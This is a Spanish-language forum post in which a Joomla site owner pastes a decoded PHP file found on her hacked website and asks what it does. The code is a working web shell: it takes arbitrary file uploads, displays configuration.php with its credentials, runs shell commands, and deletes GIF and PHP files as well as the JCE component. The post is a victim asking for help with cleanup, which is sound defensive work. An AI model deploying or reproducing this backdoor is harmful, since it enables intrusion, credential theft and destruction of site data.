Ver Mensaje Individual
  #1 (permalink)  
Antiguo 23/10/2013, 01:07
jruiniegm
 
Fecha de Ingreso: noviembre-2007
Mensajes: 1
Antigüedad: 16 años, 5 meses
Puntos: 0
Pregunta Web Hackeada con este código.. ¿alguien me lo explica?

Buenos dias.
Soy muy novata en el php... sin embargo utilizo Joomla para crear mis webs.
Mi problema es que desde hace un tiempo me están hackeando una de ellas. Encontré un archivo php supuestamente malicioso y pude decodificarlo en Base64. El resultado es lo que escribo a continuación... pero no sé interpretarlo.
Alguna idea que me ayude a eliminar dichos virus en mi sistema? Gracias a todos por vuestro tiempo... ahí va el codigo:

error_reporting(0);
echo "<title>+[ Joomla is Free ]+</title>";
$os = php_uname();
echo "<center> Info-Kang:".$os." </center>";
if (!empty($_FILES)) {
$tempFile = $_FILES['Fileupload']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['kemana'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Fileupload']['name'];
move_uploaded_file($tempFile,$targetFile);
echo "1";
}
if(isset($_GET['read'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}
echo "<pre><font size=3 color=#000000>".shell_exec('echo KcB#`pwd`#KcB; ls -lia; rm -f *.gif')."</font></pre>";
if(isset($_GET['patch'])){
$deljce = '../../components/com_jce/jce.php';
unlink($deljce);
}
if(isset($_GET['del'])){
$mask = "*.php";
array_map( "unlink", glob( $mask ) );
echo "<pre><font size=3 color=#000000>".shell_exec('rm -f *.php')."</font></pre>";
}